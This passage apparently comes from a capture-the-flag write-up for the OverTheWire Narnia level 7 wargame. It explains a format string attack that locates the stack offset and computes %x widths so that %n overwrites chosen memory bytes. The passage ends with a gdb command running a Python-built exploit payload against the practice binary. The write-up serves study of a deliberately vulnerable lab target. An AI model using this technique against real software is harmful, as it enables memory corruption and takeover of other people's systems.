Alpackers/CTF-Writeups/Misc/OverTheWire/Narnia/Narnia7/Readme.md

 +++ exited (status 0) +++
 >```
 >
+> Well that definately worked.
+We can see our ```0x41414141``` is popped off after 6 ```%x```.
+So now we can setup for the writes.
+We'll need to reference each byte of the memory that we want to overwrite each separated by any four bytes.
+Here we'll use ```JUNK``` from our example as it is 4 bytes.
+After that, we'll need to try to determine what the first width of the first format string will be as it will allow us to write our first value to memory.
+We can determine that by first see what value exists currently in memory with the standard with of ```%8x```.
+Once we determine that, we can determine our actual width using ```"the byte to be written" - "the outputted byte" + 8```.
+After translating that value to decimal we can set the width of the 5th ```%x``` which should be the ```%x``` right before our ```%n```.
+This will effectively overwrite the first byte of memory with our desired value.
+Let's see if it works.
+>
 >```
 (gdb) run $(python -c 'print "\x0c\xd6\xff\xffJUNK\x0d\xd6\xff\xffJUNK\x0e\xd6\xff\xffJUNK\x0f\xd6\xff\xff"+"%x%x%x%x%8x%n"') Starting program: /games/narnia/narnia7 $(python -c 'print "\x0c\xd6\xff\xffJUNK\x0d\xd6\xff\xffJUNK\x0e\xd6\xff\xffJUNK\x0f\xd6\xff\xff"+"%x%x%x%x%8x%n"')